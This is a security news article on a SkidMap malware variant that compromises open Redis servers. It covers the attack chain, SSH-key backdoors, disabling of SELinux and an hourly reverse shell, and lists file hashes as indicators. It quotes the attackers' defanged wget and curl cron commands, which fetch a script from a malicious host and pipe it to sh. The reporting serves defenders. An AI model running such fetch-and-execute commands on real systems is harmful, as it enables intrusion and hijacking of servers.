According to recent reports, there have been instances of threat actors using malware called “SkidMap” to exploit vulnerable Redis systems.
Earlier versions of SkidMap were used to surreptitiously mine cryptocurrency and create false network traffic and CPU usage by loading malicious kernel modules.
However, this malware’s recent version seems quite sophisticated and targets only open Redis instances.
Further analysis of the new variant on SkidMap revealed activities like adaptation to the operating system where it gets executed and choosing the binary to download based on the Linux Distribution architecture on the infected system.
Initially, the threat actor attempts to login to open Redis instances for setting up cron tasks with a variable using base64 string. These strings consist of two cron tasks to run a “wget” (wget hxxp://z[.]shavsl[.]com/b -qO – | sh) and “curl” (curl -fsSL hxxp://z[.]shavsl[.]com/b | sh)command that gets executed at a 10 minute interval for downloading the dropper scripts ‘b’, ‘c’ and ‘f’.
The dropper scripts are used to download an executable binary file (ELF) ‘gif’ (previous version used ‘jpeg’) to the ‘/var/lib/’ directory, which is the trojan file.
This trojan initially adds some SSH keys in the standard locations ‘/root/.ssh/authoried_keys’ and ‘/root/.ssh/authoried_keys2’. This is done to leave a backdoor for threat actors to login to the system.
Further actions include checking the status of SElinux (Security-Enhanced Linux) module, which is used to implement access control security policies and disable it permanently. After this, the trojan is made permanent by making specific modifications on the host OS.
The trojan creates a reverse shell to the C2 server of the attackers every hour through the TCP/8443 port. The gif binary is found to be targeting linux distributions like Alibaba, Anolis, openEuler, EulerOS, Steam, CentOS, RedHat, and Rock.
A complete report has been published by Trustwave, which provides a complete explanation on the threat actors’ tactics, methods, source code, and other analysis.
| File Name | Hash Type | Hashes |
| b, c, f | MD5 | 000916c60b2ab828ba8cea914c308999 |
| SHA1 | 9970809e1dedce286888f7d25790b4dcca1e704b | |
| SHA256 | 969e10e4a61cc5f80c414259c4d90c74bcf43ccd5678910700bdc14cd60f9725 | |
| gif | MD5 | e23b3c7eb5d68e3cd43e9e61a3055fe8 |
| SHA1 | 940f45f8a5dfb16281a35cd8303cd98c1ab1fabd | |
| SHA256 | f77c4b704b20affdd737af44cabd3d7b56d8987924f2179137bbeef0e4be0367 | |
| jpeg | MD5 | e23b3c7eb5d68e3cd43e9e61a3055fe8 |
| SHA1 | 940f45f8a5dfb16281a35cd8303cd98c1ab1fabd | |
| SHA256 | f77c4b704b20affdd737af44cabd3d7b56d8987924f2179137bbeef0e4be0367 | |
| .miner | MD5 | 44de739950eb4a8a3552b4e1987e8ec2 |
| SHA1 | 0ae049aab363fb8d2e164150dffbafd332725e00 | |
| SHA256 | 9b81bad2111312e669697b69b9f121a1f9519da61cd5d37689e38381c1ffad28 |
Keep informed about the latest Cyber Security News by following us on GoogleNews, Linkedin, Twitter, and Facebook.
The BPFDoor malware has emerged as a significant threat targeting domestic and international organizations, particularly…
As artificial intelligence continues to reshape the technological landscape, tools like Snowflake’s CORTEX Search Service…
UNC3944, a financially-motivated threat actor also linked to the group known as Scattered Spider, has…
Cybersecurity researcher has uncovered a massive malware campaign targeting MacOS users through approximately 2,800 compromised…
Cybersecurity researchers have uncovered a critical flaw in the content moderation systems of AI models…
Microsoft’s cybersecurity research team has issued a stark warning about the risks of using default…
![](data:image/svg+xml;charset=utf-8,<svg height="400px" width="1000px" xmlns="http://www.w3.org/2000/svg" version="1.1"/>)
%20(1).webp?w=1600&resize=1600,900&ssl=1)
